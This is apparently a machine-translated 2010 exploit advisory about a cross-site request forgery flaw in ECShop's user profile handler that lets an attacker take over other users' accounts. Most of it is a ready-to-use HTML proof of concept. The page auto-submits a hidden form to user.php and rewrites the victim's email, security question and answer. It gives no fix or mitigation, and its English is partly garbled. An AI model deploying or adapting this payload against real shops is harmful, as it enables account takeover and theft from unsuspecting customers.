ecshop modify any user password vulnerability of the CSRF exploit-vulnerability warning-the black bar safety net

2010-10-05T00:00:00
ID MYHACK58:62201028027
Type myhack58
Reporter 佚名
Modified 2010-10-05T00:00:00

Description

ecshop in the design of the authentication mechanism when there is a problem, resulting in malicious users can steal other user's password, this process can be byxssand csrf to achieve

Vulnerability exp:

<html> <body>

<form action="http://www.chinasg.tk/ecshop/user.php" method="POST">

<INPUT TYPE="text" NAME="email" value="cnhackerx@163.com">

<INPUT TYPE="text" NAME="act" value="act_edit_profile">

<INPUT TYPE="text" NAME="sel_question" value="ecshop">

<INPUT TYPE="text" NAME="passwd_answer" value="exploit">

</body>

<script>

document. forms[0]. submit();

</script>

</html>